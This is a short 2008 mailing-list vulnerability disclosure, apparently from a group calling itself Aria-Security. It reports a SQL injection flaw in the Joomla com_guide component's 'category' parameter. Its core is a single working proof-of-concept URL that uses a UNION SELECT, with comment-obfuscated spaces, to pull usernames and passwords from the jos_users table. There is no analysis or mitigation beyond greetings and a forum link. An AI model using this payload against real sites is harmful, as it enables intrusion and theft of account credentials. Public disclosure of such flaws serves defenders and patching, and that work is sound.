Joomla components com_guide "category" Remote SQL Injection
Date: 15 Mar 2008 23:56:22 -0000
From: [email protected]
To: [email protected]
Subject: Joomla components com_guide "category" Remote SQL Injection
[Aria-Security]
X-Virus-Scanned: antivirus-gw at tyumen.ru
Aria-Security Team (Persian Security Network)
http://forum.aria-security.com
--------------------------------
Join our english forum @ http://forum.aria-security.com
Shoutz: Aura, Null, Kinglet, t3rr0r1st
Joomla components com_guide "category" Remote SQL Injection
Poc:
index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
Regards,
The-0utl4w
Edit/Delete Message
